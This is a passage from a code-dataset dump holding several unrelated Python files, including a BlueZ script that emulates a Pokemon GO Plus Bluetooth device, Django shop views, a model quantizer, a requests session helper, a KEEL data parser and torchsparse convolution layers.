= UUID_LED_VIBRATE_CTRL_CHAR\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['write'],\n service)\n self.value = 0\n\n def WriteValue(self, value, options):\n self.value = value\n log(self.UUID)\n\n\nclass button_notif_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_BUTTON_NOTIF_CHAR\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['notify'],\n service)\n self.value = 0\n self.notifying = False\n\n def StartNotify(self):\n if self.notifying:\n log('Already notifying, nothing to do')\n return\n\n self.notifying = True\n log(self.UUID)\n\n def StopNotify(self):\n if not self.notifying:\n log('Not notifying, nothing to do')\n return\n\n self.notifying = False\n log(self.UUID)\n\n\nclass unknown_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_UNKNOWN_CHAR\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['write'],\n service)\n self.value = 0\n\n def WriteValue(self, value, options):\n self.value = value\n log(self.UUID)\n\n\nclass sfida_commands_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_SFIDA_COMMANDS_CHAR\n self.tag = \"Commands\"\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['notify'],\n service)\n self.value = 0\n self.notifying = False\n\n def StartNotify(self):\n if self.notifying:\n log('Already notifying, nothing to do', self.tag)\n return\n\n self.notifying = True\n # GObject.timeout_add(1000, self.StopNotify)\n log(\"start \" + str(self.uuid), self.tag)\n\n def StopNotify(self):\n if not self.notifying:\n log('Not notifying, nothing to do', self.tag)\n return\n\n self.notifying = False\n log(\"stop \" + self.UUID, self.tag)\n\n\nclass sfida_to_central_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_SFIDA_TO_CENTRAL_CHAR\n self.tag = \"STC\"\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['read'],\n service)\n self.value = [3, 0, 0, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16]\n for num, val in enumerate(self.value):\n self.value[num] = dbus.Byte(val)\n\n def ReadValue(self, options):\n log(self.UUID + \" \" + str(self.value), self.tag)\n return [dbus.Byte(self.value)]\n\n\nclass central_to_sfida_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_CENTRAL_TO_SFIDA_CHAR\n self.tag = \"CTS\"\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['write'],\n service)\n self.value = 3\n\n def WriteValue(self, value, options):\n log([self.UUID, value, options], self.tag)\n self.value = value\n\n\nclass battery_level_chrc(Characteristic):\n def __init__(self, bus, index, service):\n self.UUID = UUID_BATTERY_LEVEL_CHAR\n\n Characteristic.__init__(\n self, bus, index,\n self.UUID,\n ['notify', 'read'],\n service)\n self.value = 80\n self.notifying = False\n\n def ReadValue(self, options):\n log('Battery Level Read: ' + repr(self.value))\n log(self.UUID)\n return [dbus.Byte(self.value)]\n\n def StartNotify(self):\n if self.notifying:\n log('Already notifying, nothing to do')\n return\n\n self.notifying = True\n self.notify_battery_level()\n log(self.UUID)\n\n def StopNotify(self):\n if not self.notifying:\n log('Not notifying, nothing to do')\n return\n\n self.notifying = False\n log(self.UUID)\n\n\nclass device_control_service(Service):\n \"\"\" Fake Device Control Update Service.\"\"\"\n\n def __init__(self, bus, index):\n UUID = UUID_DEVICE_CONTROL_SERVICE\n Service.__init__(self, bus, index, UUID, True)\n self.add_characteristic(led_vibrate_chrc(bus, 0, self))\n self.add_characteristic(button_notif_chrc(bus, 1, self))\n self.add_characteristic(unknown_chrc(bus, 2, self))\n self.add_characteristic(fw_update_request_chrc(bus, 3, self))\n self.add_characteristic(fw_version_chrc(bus, 4, self))\n\n\nclass certificate_service(Service):\n \"\"\" Certificate Service.\"\"\"\n\n def __init__(self, bus, index):\n UUID = UUID_CERTIFICATE_SERVICE\n Service.__init__(self, bus, index, UUID, True)\n self.add_characteristic(sfida_commands_chrc(bus, 0, self))\n self.add_characteristic(central_to_sfida_chrc(bus, 1, self))\n self.add_characteristic(sfida_to_central_chrc(bus, 2, self))\n\n\nclass battery_service(Service):\n \"\"\" Fake Battery Service.\"\"\"\n\n def __init__(self, bus, index):\n UUID = UUID_BATTERY_SERVICE\n Service.__init__(self, bus, index, UUID, True)\n self.add_characteristic(battery_level_chrc(bus, 0, self))\n\n\nclass po_go_plus_app(Application):\n def __init__(self, bus):\n Application.__init__(self, bus)\n self.add_service(battery_service(bus, 0))\n self.add_service(device_control_service(bus, 1))\n self.add_service(certificate_service(bus, 2))\n\n\nclass po_go_plus_advertisement(Advertisement):\n def __init__(self, bus, index):\n Advertisement.__init__(self, bus, index, 'peripheral')\n self.add_service_data(\"21c50462\", [0x00])\n self.include_tx_power = True\n\n\ndef log(message, tag=\"INFO\"):\n print(now.strftime(\"%Y-%m-%d %H:%M:%S\") + \":[\" + tag + \"] \" + message)\n\n\ndef main():\n global mainloop\n\n dbus.mainloop.glib.DBusGMainLoop(set_as_default=True)\n\n bus = dbus.SystemBus()\n\n # Get ServiceManager and AdvertisingManager\n gatt_properties = [\n {\"Name\": \"Discoverable\", \"Set\": True, \"Value\": False},\n ]\n\n service_manager = get_service_manager(bus, gatt_properties)\n\n ad_properties = [\n {\"Name\": \"Discoverable\", \"Set\": True, \"Value\": True},\n {\"Name\": \"DiscoverableTimeout\", \"Set\": True, \"Value\": 0},\n {\"Name\": \"Class\", \"Set\": False},\n {\"Name\": \"Address\", \"Set\": False},\n {\"Name\": \"Name\", \"Set\": False},\n {\"Name\": \"Alias\", \"Set\": True, \"Value\": \"Pokemon GO Plus\"},\n {\"Name\": \"UUIDs\", \"Set\": False},\n {\"Name\": \"Modalias\", \"Set\": False},\n ]\n\n ad_manager = get_advertisement_manager(bus, ad_properties)\n\n # Create gatt services\n app = po_go_plus_app(bus)\n\n # Create advertisement\n po_go_plus_ad = po_go_plus_advertisement(bus, 0)\n\n mainloop = GObject.MainLoop()\n\n # Register gatt services\n service_manager.RegisterApplication(app.get_path(), {},\n reply_handler=register_app_cb,\n error_handler=register_app_error_cb)\n\n # Register advertisement\n ad_manager.RegisterAdvertisement(po_go_plus_ad.get_path(), {},\n reply_handler=register_ad_cb,\n error_handler=register_ad_error_cb)\n\n log(\"PokeBrm Started\")\n try:\n mainloop.run()\n except KeyboardInterrupt:\n service_manager.UnregisterApplication(app.get_path())\n ad_manager.UnregisterAdvertisement(po_go_plus_ad.get_path())\n print('exit')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"pokebrm_bluez.py","file_name":"pokebrm_bluez.py","file_ext":"py","file_size_in_byte":9534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"93091908","text":"from django.core.mail import send_mail, BadHeaderError\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.db.models import Count, Sum\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import views as auth_views\nfrom .forms import UserSignupForm, ContactForm, UserUpdateForm, AccountUpdateForm\nfrom .models import Cart\nfrom store.models import Product\n\ndef signup(request):\n if request.method == 'POST':\n form = UserSignupForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, f\"Account created successfully!!\")\n return redirect('login')\n else:\n form = UserSignupForm()\n return render(request, 'users/signup.html', { 'title': 'Sign Up', 'form': form })\n\ndef login(request):\n if request.user.is_authenticated:\n return redirect('store-home')\n else:\n return auth_views.LoginView.as_view(template_name='users/login.html')(request)\n\ndef logout(request):\n if request.user.is_authenticated:\n return auth_views.LogoutView.as_view(template_name='users/logout.html')(request)\n else:\n return redirect('store-home')\n\ndef contact_us(request):\n if request.method == 'GET':\n form = ContactForm()\n else:\n form = ContactForm(request.POST)\n if form.is_valid():\n if request.user.is_authenticated:\n subject = form.cleaned_data['subject']\n from_email = request.user.email\n message = form.cleaned_data['message']\n message = \"From: \" + from_email + \"\\n\" + message\n try:\n send_mail(subject, message, from_email, ['']) # fill the list with your email id\n except BadHeaderError:\n messages.success(request, f\"Couldn't sent message. Invalid header found.\")\n return render(request, \"users/contact-us.html\", { 'title': 'Contact Us', 'form': form })\n return redirect('contact_success')\n return render(request, \"users/contact-us.html\", { 'title': 'Contact Us', 'form': form })\n\ndef contact_success(request):\n return render(request, 'users/contact-success.html', { 'title': 'Message Sent Successfully' })\n\n@login_required\ndef account(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n a_form = AccountUpdateForm(request.POST, instance=request.user.account)\n if u_form.is_valid() and a_form.is_valid():\n u_form.save()\n a_form.save()\n messages.success(request, f\"Account updated successfully!!\")\n return redirect('my-account')\n else:\n u_form = UserUpdateForm(instance=request.user)\n a_form = AccountUpdateForm(instance=request.user.account)\n return render(request, 'users/my-account.html', { 'title': 'My Account', 'u_form': u_form, 'a_form': a_form })\n\n@login_required\ndef cart(request):\n cart_count = Cart.objects.filter(cart_id=request.user).count()\n if cart_count == 0:\n return render(request, 'users/my-cart.html', { 'title': 'My Cart', 'cart_count': cart_count })\n else:\n cart = Cart.objects.filter(cart_id=request.user)\n cart_products = cart.values('product_id').annotate(pcount=Count('product_id'))\n cart_price = cart.aggregate(Sum('product_price'))\n if request.method == \"GET\":\n product_id = request.GET.get('add')\n if product_id != None:\n cart = Cart.objects.filter(cart_id=request.user)\n cart.filter(product_id=product_id).delete()\n return redirect('my-cart')\n return render(request, 'users/my-cart.html', { 'title': 'My Cart', 'cart_count': cart_count, 'cart_products': cart_products, 'products': Product.objects.all(), 'cart_price': cart_price['product_price__sum'] })\n","sub_path":"users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"424371265","text":"# Copyright 2019 ZTE corporation. All Rights Reserved.\n# SPDX-License-Identifier: Apache-2.0\n\n\"\"\"\nModel quantizer base class\n\"\"\"\nimport os\nimport shutil\nimport uuid\nfrom abc import abstractmethod\nfrom .compressor import compress_dir\nfrom .message import fail, success\nfrom ..log_util import get_logger\n_LOGGER = get_logger(__name__)\n\n\nclass BaseQuantizer:\n \"\"\"\n Quantizer base class\n \"\"\"\n _COMMON_PARAMS = [\n \"input_model\",\n \"model_name\",\n \"export_path\",\n \"version\"\n ]\n _COMMON_REQUIRED = [\n \"input_model\",\n \"model_name\",\n \"export_path\"\n ]\n\n def __init__(self, config):\n for item in self._COMMON_PARAMS:\n if config.get_attribute(item) is None and item in self._COMMON_REQUIRED:\n _LOGGER.error('Require \"%s\" but not found', item)\n raise Exception('Require \"%s\" but not found' % item)\n self.__setattr__(item, config.get_attribute(item))\n self.model_dir = self._make_model_dir()\n self.version, self.version_dir = self._get_version_dir()\n self.target_dir = self._make_target_dir()\n self.custom_object = None\n _LOGGER.info('Output dir is: %s, version: %s', self.model_dir, self.version)\n\n def quantize(self):\n \"\"\"\n Quantize model\n :return: Return quantize result\n \"\"\"\n try:\n self._do_quantize()\n os.rename(self.target_dir, self.version_dir)\n zip_path = self._compress([self.version_dir])\n return success(zip_path)\n except Exception as error: # pylint:disable=broad-except\n _LOGGER.error('Quantize model failed, error: %s', error)\n _LOGGER.exception(error)\n self._cleanup()\n return fail(str(error))\n\n def _compress(self, source_list):\n \"\"\"\n Compress model to .zip\n :return:\n \"\"\"\n # self.target_dir -> modelName_version.zip\n zip_file_path = os.path.join(self.export_path, self.model_name + '_' + str(self.version) + '.zip')\n return compress_dir(source_list, zip_file_path)\n\n def _make_model_dir(self):\n \"\"\"\n Make model dir, the structure of export dir is:\n export_dir\n |--model_name\n |-- version_1(version_dir)\n | |-- tftrt SavedModel or tflite model\n |-- version_2\n |-- tftrt SavedModel or tflite model\n :return:\n \"\"\"\n _LOGGER.info('make_model_dir: export base path: %s', self.export_path)\n if not os.path.exists(self.export_path):\n os.makedirs(self.export_path, exist_ok=True)\n model_dir = os.path.join(self.export_path, self.model_name)\n os.makedirs(model_dir, exist_ok=True)\n return model_dir\n\n def _get_version_dir(self):\n version = getattr(self, \"version\", None)\n if version is None:\n version = self._get_model_default_version()\n version = str(version)\n version_dir = os.path.join(self.model_dir, version)\n _LOGGER.info(\"Export model version : %s, dir: %s\", version, version_dir)\n if os.path.exists(version_dir):\n raise Exception('Output version is already exist: {}'.format(version_dir))\n return version, version_dir\n\n def _get_model_default_version(self):\n sub_dirs = [int(child) for child in os.listdir(self.model_dir)\n if os.path.isdir(os.path.join(self.model_dir, child)) and child.isdigit()]\n sub_dirs.sort()\n version = str(sub_dirs[-1] + 1) if sub_dirs else \"1\"\n return version\n\n def _make_target_dir(self):\n temp_dir_name = str(uuid.uuid3(uuid.NAMESPACE_URL, '_'.join([self.model_name, self.version])))\n _LOGGER.info(\"temporary export dir: %s, %s\", temp_dir_name, os.path.join(self.model_dir, temp_dir_name))\n target_dir = os.path.join(self.model_dir, temp_dir_name)\n if not os.path.exists(target_dir):\n os.makedirs(target_dir, exist_ok=True)\n return target_dir\n\n def _cleanup(self):\n if os.path.exists(self.target_dir):\n shutil.rmtree(self.target_dir)\n if os.path.exists(self.version_dir):\n shutil.rmtree(self.version_dir)\n\n @abstractmethod\n def _do_quantize(self):\n pass\n","sub_path":"src/model_optimizer/quantizer/quantizer_base.py","file_name":"quantizer_base.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"29316945","text":"#!/usr/bin/env python\n# encoding: utf-8\n\ndef build(bld):\n pinte_target = 'Pinte'\n pinte_features = ['c', 'cprogram']\n pinte_uselibs = ['GTK3', 'GTKGLEXT3', 'GIO2']\n pinte_headers = ['pinte.h', 'pinte-app.h', 'pinte-window.h', 'pinte-project.h',\n 'pinte-surface.h', 'pinte-utils.h']\n pinte_source = ['pinte.c', 'pinte-app.c', 'pinte-window.c', 'pinte-project.c',\n 'pinte-surface.c', 'pinte-utils.c']\n\n if (bld.options.debug):\n pinte_uselibs + ['-g', '-Wall']\n\n pinte = bld(features=pinte_features,\n headers=pinte_headers,\n source=pinte_source,\n target=pinte_target,\n uselib=pinte_uselibs,\n includes='.')","sub_path":"src/wscript","file_name":"wscript","file_ext":"","file_size_in_byte":743,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"13065503","text":"import requests\r\nfrom .cookies import *\r\n\r\n\r\nclass sessionCreFalse(Exception):\r\n pass\r\n\r\nclass urlNotDefine(Exception):\r\n pass\r\n\r\nclass urlNoCookies(Exception):\r\n pass\r\n\r\nclass urlNoHeaders(Exception):\r\n pass\r\n\r\nclass sessionPost(Exception):\r\n pass\r\n\r\nclass GetReqError(Exception):\r\n pass\r\n\r\n\r\nclass session():\r\n class_cookies=0\r\n class_headers={}\r\n class_url1=''\r\n class_url2=''\r\n class_session=requests.session()\r\n\r\n def __init__(self,url='',cookies=0,headers={}):\r\n\r\n try:\r\n if url and cookies and headers:\r\n ret_obj=class_session.get(url,cookies=cookies,headers=headers)\r\n elif url and cookies and not headers:\r\n ret_obj=class_session.get(url,cookies=cookies)\r\n else:\r\n ret_obj=0\r\n if ret_obj!=0:\r\n if(ret_obj.status_code!=200):\r\n raise sessionCreFalse('\\n\\nsession not create successfully\\n\\n')\r\n self.set_url1(url)\r\n self.set_cookies(ret_obj.cookies)\r\n self.set_headers(headers) \r\n\r\n except sessionCreFalse as except0:\r\n print(except0)\r\n quit()\r\n\r\n def set_cookies(self,arg_cookies):\r\n self.class_cookies=cookies.all2jar(arg_cookies)\r\n def set_headers(self,headers):\r\n self.class_headers=headers\r\n def set_url1(self,url):\r\n self.class_url1=url\r\n def set_url2(self,url):\r\n self.class_url2=url\r\n\r\n def sessionCre(self,url='',cookies=0,headers={}):\r\n try:\r\n if url:\r\n self.set_url1(url)\r\n if cookies:\r\n self.set_cookies(cookies)\r\n if headers:\r\n self.set_headers(headers)\r\n if not self.class_url1:\r\n raise urlNotDefine('\\n\\nnot set request url\\n\\n')\r\n if not self.class_cookies:\r\n raise urlNoCookies('\\n\\nnot set requests cookies\\n\\n')\r\n except urlNotDefine as except1:\r\n print(except1)\r\n quit()\r\n except urlNoCookies as except2:\r\n print(except2)\r\n quit()\r\n\r\n try:\r\n if self.class_headers:\r\n ret_obj=class_session.get(self.class_url1,cookies=self.class_cookies,headers=self.class_headers)\r\n elif not self.class_headers:\r\n ret_obj=class_session.get(self.class_url,cookies=self.class_cookies)\r\n else:\r\n raise sessionCreFalse('\\n\\nnot set url, cookies, headers\\n\\n')\r\n if(ret_obj.status_code!=200):\r\n raise sessionCreFalse('\\n\\nsession not create successfully\\n\\n')\r\n self.set_cookies(ret_obj.cookies) \r\n return ret_obj \r\n\r\n except sessionCreFalse as except0:\r\n print(except0)\r\n quit()\r\n \r\n \r\n\r\n def post(self,url='',cookies={},data={},headers={}):\r\n try:\r\n if url:\r\n self.set_url2(url)\r\n if cookies:\r\n self.set_cookies(cookies)\r\n if headers:\r\n self.set_headers(headers)\r\n if not self.class_url2:\r\n raise urlNotDefine('\\n\\nnot set request obj\\n\\n')\r\n if not self.class_cookies:\r\n raise urlNoCookies('\\n\\nnot set requests cookies\\n\\n')\r\n if not self.class_headers:\r\n raise urlNoHeaders('\\n\\nnot set requests headers\\n\\n')\r\n except urlNotDefine as except1:\r\n print(except1)\r\n quit()\r\n except urlNoCookies as except2:\r\n print(except2)\r\n quit()\r\n except urlNoHeaders as except3:\r\n print(except3)\r\n quit()\r\n try:\r\n ret_obj=class_session.request.post(self.class_url2,cookies=self.class_cookies,headers=self.class_headers,data=data)\r\n if ret_obj.status_code!=200:\r\n raise sessionPost('\\n\\nsession post request error\\n\\n')\r\n self.set_cookies(ret_obj.cookies)\r\n return ret_obj\r\n except sessionPost as except4:\r\n print(except4)\r\n quit()\r\n\r\n\r\n def get(url='',cookies=0,headers={},params={}):\r\n try:\r\n if url:\r\n self.set_url2(url)\r\n if cookies:\r\n self.set_cookies(cookies)\r\n if headers:\r\n self.set_headers(headers)\r\n if (not self.class_url2):\r\n raise urlNotDefine('\\n\\nnot set request obj\\n\\n')\r\n if (not self.class_cookies):\r\n raise urlNoCookies('\\n\\nnot set requests cookies\\n\\n')\r\n if (not self.class_headers):\r\n raise urlNoHeaders('\\n\\nnot set requests headers\\n\\n')\r\n except urlNotDefine as except1:\r\n print(except1)\r\n quit()\r\n except urlNoCookies as except2:\r\n print(except2)\r\n quit()\r\n except urlNoHeaders as except3:\r\n print(except3)\r\n quit()\r\n try:\r\n ret_obj=class_session.request.get(self.class_url2,cookies=self.class_cookies,headers=self.class_headers,params=params)\r\n if ret_obj.status_code!=200:\r\n raise GetReqError('\\n\\nsession get request error\\n\\n')\r\n self.set_cookies(ret_obj.cookies)\r\n return ret_obj\r\n\r\n except GetReqError as except4:\r\n print(except4)\r\n quit()\r\n","sub_path":"pwn/linux_pwn/mypwn/mypwn/mypwn/mypwnlib/submit_flag/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":5601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"116981845","text":"def kilograms_to_pounds():\n user_kilograms = input(\"Your weight in kg: \")\n user_pounds = float(user_kilograms) * 2.20462\n print(\"Your weight in pounds: \" + str(user_pounds))\n\ndef pounds_to_kilograms():\n user_pounds = input(\"Your weight in lbs: \")\n user_kilograms = int(user_pounds) * 0.453592\n print(\"Your weight in kilograms: \" + str(user_kilograms))\n\n\ndef user_weight():\n user_name = input(\"What is your name? (You don't have to enter your full name) \")\n weight_choice = input(\"Welcome, \" + user_name + \", to the weight converter! Would you like to convert your weight into\"\n \"pounds or kilograms?\\nPick one of the following\\nPounds (lbs)\"\n \" or Kilograms (kg): \").lower()\n if weight_choice == \"lbs\" or weight_choice == \"pounds\":\n kilograms_to_pounds()\n print(\"Enjoy your day, \" + user_name + \" :D\")\n elif weight_choice == \"kg\" or weight_choice == \"kilograms\":\n pounds_to_kilograms()\n print(\"Enjoy your day, \" + user_name + \" :D\")\n else:\n print(\"Your selection was invalid.\")\n\n\nuser_weight()","sub_path":"weight.py","file_name":"weight.py","file_ext":"py","file_size_in_byte":1163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"576079702","text":"# This Python file uses the following encoding: utf-8\n\"\"\"Module for interaction with data storage\"\"\"\nfrom collections import namedtuple\nimport uuid\nfrom snakeguice import inject, annotate\n\n__author__ = 'xander27'\nimport numpy as np\nimport logging as log\nimport cPickle as pickle\n\nDataSet = namedtuple('DataSet',\n ['n_samples', 'n_features', 'data','target',\n 'feature_names', 'target_names',\n 'feature_class_names', 'row_weights'])\ndef convert_sci_kit_data_set(data_set):\n n_samples, n_features = np.shape(data_set.data)\n return DataSet(\n data = data_set.data,\n n_samples = n_samples,\n n_features = n_features,\n target = data_set.target,\n target_names = data_set.target_names,\n feature_names = data_set.feature_names,\n feature_class_names = dict(),\n row_weights = [1] * n_samples\n )\n\nclass DataProvider:\n\n def __init__(self, file_name, init_data_file_name):\n self.init_data_file_name = init_data_file_name\n self._file_name = file_name\n self._load_data()\n\n def _init_data_from_keel(self, f_name):\n \"\"\"\n Load init data from KEEL format file\n\n Params:\n f_name: file name\n \"\"\"\n import pyparsing as pp\n\n\n LabelVariable = namedtuple('LabelVariable', ['name', 'labels'])\n NumberVariable = namedtuple('NumberVariable', ['name', 'min', 'max'])\n #configure parser\n empty_gap = uuid.uuid1()\n var_name = pp.Word(pp.alphas + \"_+-/\" + pp.nums)\n label = pp.Word(pp.nums + pp.alphas + \"_+-/.\")\n number = pp.Word(pp.nums + \".-\").setParseAction(lambda t: [float(t[0])])\n attr_begin = pp.Suppress(\"@attribute\") + var_name(\"name\")\n attr_number = (\n attr_begin + pp.oneOf(\"real integer\") + pp.Suppress(\"[\") +\n number(\"min\") + pp.Suppress(\",\") + number(\"max\") + pp.Suppress(\"]\")\n ).setParseAction(lambda t: NumberVariable(t.name, t.min, t.max))\n attr_label = (\n attr_begin + pp.Suppress(\"{\")+\n pp.Group(pp.OneOrMore(label + pp.Suppress(\",\")) + label)\n .setResultsName(\"labels\")\n + pp.Suppress(\"}\")\n ).setParseAction(lambda t: LabelVariable(t.name, list(t.labels)))\n attr = attr_number | attr_label\n output = pp.Suppress(\"@outputs\") + var_name\n empty = ( pp.Literal(\"?\")).setParseAction(lambda t: empty_gap)\n line = pp.Group(pp.OneOrMore((label | number | empty ) + pp.Suppress(\",\"))\n + ( label | number | empty ))\n data = pp.Suppress(\"@data\") + pp.OneOrMore(line)\n case = pp.Suppress(pp.SkipTo(attr)) + \\\n pp.Group(pp.OneOrMore(attr)).setResultsName(\"attrs\")\\\n + pp.Suppress(pp.SkipTo(output)) + output(\"output\") + data(\"data\")\\\n# + pp.stringEnd\n try:\n with open(f_name, \"r\") as f:\n# print f.read()\n parsed = case.parseString(f.read())\n except IOError:\n log.error(\"Can't read init data from '%s'\" % self.init_data_file_name)\n raise\n\n vars = list(parsed.attrs)\n output_var = None\n for var in vars:\n if var.name == parsed.output[0]:\n output_var = var\n break\n\n def get_var_value(var, val):\n if isinstance(var, NumberVariable):\n return val\n elif isinstance(var, LabelVariable):\n return var.labels.index(val)\n\n vars_count = len(vars)\n data_len = len(parsed.data)\n data = np.empty((data_len, vars_count - 1))\n target = np.empty(data_len)\n for i, line in zip(xrange(data_len), parsed.data):\n w = 0\n for j, var in zip(xrange(vars_count), vars):\n if var == output_var:\n if line[j] != empty_gap:\n target[i] = get_var_value(var, line[j])\n else:\n continue\n elif line[j] != empty_gap:\n data[i, w] = get_var_value(var, line[j])\n w+= 1\n else:\n data[i, w] = None\n w+=1\n vars.remove(output_var)\n feature_class_names = dict()\n for i, var in zip(xrange(len(vars)), vars):\n if isinstance(var, LabelVariable):\n feature_class_names[i] = var.labels\n return DataSet(\n n_samples = data_len,\n n_features = len(vars),\n data = data,\n target = target,\n feature_names = map(lambda v: v.name, vars),\n target_names = output_var.labels,\n feature_class_names = feature_class_names,\n row_weights = [1] * data_len\n )\n\n\n def _load_data(self):\n try:\n self._data = pickle.load(open(self._file_name, \"rb\"))\n except IOError:\n log.error(\"Can't read from '%s'\" % self._file_name)\n log.info(\"read data from '%s'\" % self.init_data_file_name)\n self._data = self._init_data_from_keel(self.init_data_file_name)\n\n def get_data(self):\n return self._data\n\n def set_data(self, data):\n self._data = data\n\n def save(self):\n try:\n pickle.dump(self._data, open(self._file_name, \"wb+\"))\n except IOError:\n log.error(\"Can't write to '%s'\" % self._file_name)\n raise\n","sub_path":"src/krasn/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":5492,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"82284831","text":"import math\n\nimport torch\nfrom torch import nn\n\nfrom torchsparse.sparse_tensor import *\n\nfrom ..functional import *\n\n__all__ = ['Conv3d', 'ToBEVConvolution', 'ToBEVReduction', 'ToDenseBEVConvolution']\n\n\nclass Conv3d(nn.Module):\n def __init__(self,\n in_channels: int,\n out_channels: int,\n kernel_size: int = 3,\n stride: int = 1,\n dilation: int = 1,\n bias: bool = False,\n transpose: bool = False) -> None:\n super().__init__()\n self.in_channels = inc = in_channels\n self.out_channels = outc = out_channels\n self.kernel_size = kernel_size\n self.stride = stride\n self.dilation = dilation\n if not isinstance(kernel_size, (list, tuple)):\n self.kernel_volume = self.kernel_size ** 3\n self.kernel = nn.Parameter(\n torch.zeros(self.kernel_volume, inc,\n outc)) if self.kernel_size > 1 else nn.Parameter(\n torch.zeros(inc, outc))\n else:\n if len(self.kernel_size) == 3:\n self.kernel_volume = self.kernel_size[0]*self.kernel_size[1]*self.kernel_size[2]\n self.kernel = nn.Parameter(torch.zeros(self.kernel_volume, inc, outc))\n else:\n raise ValueError(\"kernel_size must be either an integer of a 3 dimensional tuple\")\n\n\n self.bias = None if not bias else nn.Parameter(torch.zeros(outc))\n self.t = transpose\n self.init_weight()\n\n if kernel_size == 1:\n assert not transpose\n\n def __repr__(self):\n if not self.t:\n return 'Conv3d(in_channels=%d, out_channels=%d, kernel_size=%d, stride=%d, dilation=%d)' % (\n self.in_channels, self.out_channels, self.kernel_size,\n self.stride, self.dilation)\n else:\n return 'Conv3d(in_channels=%d, out_channels=%d, kernel_size=%d, stride=%d, dilation=%d)' % (\n self.in_channels, self.out_channels, self.kernel_size,\n self.stride, self.dilation)\n\n def init_weight(self):\n std = 1. / math.sqrt(\n self.out_channels if self.t else self.in_channels *\n (self.kernel_volume))\n self.kernel.data.uniform_(-std, std)\n if self.bias is not None:\n self.bias.data.uniform_(-std, std)\n\n def forward(self, inputs):\n return conv3d(inputs,\n self.kernel,\n ks=self.kernel_size,\n bias=self.bias,\n stride=self.stride,\n dilation=self.dilation,\n transpose=self.t)\n\nclass ToBEVConvolution(nn.Module):\n def __init__(self, \n in_channels: int, \n out_channels: int, \n n_kernels: int, \n stride: int = 1, \n z_dim: int = 1, \n use_bias: bool = False):\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.stride = stride\n self.z_dim = z_dim\n self.kernel = nn.Parameter(torch.zeros(n_kernels, in_channels, out_channels))\n self.bias = nn.Parameter(torch.zeros(1, out_channels)) if use_bias else 0\n self.init_weight()\n\n def init_weight(self):\n std = 1. / math.sqrt(self.in_channels)\n self.kernel.data.uniform_(-std, std)\n \n def __repr__(self):\n return 'ToBEVConvolution(in_channels=%d, out_channels=%d, n_kernels=%d, stride=%d)'%(\n self.in_channels,\n self.out_channels,\n self.n_kernels,\n self.stride\n )\n\n def forward(self, inputs):\n features = inputs.F\n coords = inputs.C\n cur_stride = inputs.s\n ratio = cur_stride * self.stride\n\n kernels = torch.index_select(self.kernel, 0, coords[:, self.z_dim].long() / cur_stride)\n output_features = (features.unsqueeze(-1) * kernels).sum(1) + self.bias\n output_coords = coords.t().long()\n output_coords[self.z_dim, :] = 0\n if self.stride > 1:\n output_coords[:3] /= ratio\n output_coords[:3] *= ratio\n flatten = torch.cuda.sparse.FloatTensor(output_coords, output_features).coalesce()\n return SparseTensor(flatten.values(), flatten.indices().t().int(), ratio)\n\n\nclass ToBEVReduction(nn.Module):\n def __init__(self, \n z_dim: int = 1):\n super().__init__()\n self.z_dim = z_dim\n \n def __repr__(self):\n return 'ToBEVReduction(z_dim = %d)'%self.z_dim\n\n def forward(self, inputs):\n features = inputs.F\n coords = inputs.C\n cur_stride = inputs.s\n\n flatten_coords = coords.clone()\n flatten_coords[:, self.z_dim] = 0\n features_with_cnt = torch.cat([torch.ones_like(features[:, :1]), features], axis=1)\n flatten = torch.cuda.sparse.FloatTensor(flatten_coords.t().long(), features_with_cnt).coalesce()\n output_features = flatten.values()[:, 1:] / flatten.values()[:, :1]\n return SparseTensor(output_features, flatten.indices().t().int(), cur_stride)\n\n\nclass ToDenseBEVConvolution(nn.Module):\n def __init__(self, \n in_channels: int, \n out_channels: int, \n shape, \n offset: list = [0,0,0], \n z_dim: int = 1, \n use_bias: bool = False):\n super().__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.offset = torch.cuda.IntTensor([list(offset) + [0]])\n self.z_dim = z_dim\n self.n_kernels = int(shape[self.z_dim])\n self.bev_dims = [i for i in range(3) if i != self.z_dim]\n self.bev_shape = shape[self.bev_dims]\n self.kernel = nn.Parameter(torch.zeros(self.n_kernels, in_channels, out_channels))\n self.bias = nn.Parameter(torch.zeros(1, out_channels)) if use_bias else 0\n self.init_weight()\n \n def __repr__(self):\n return 'ToDenseBEVConvolution(in_channels=%d, out_channels=%d, n_kernels=%d)'%(\n self.in_channels,\n 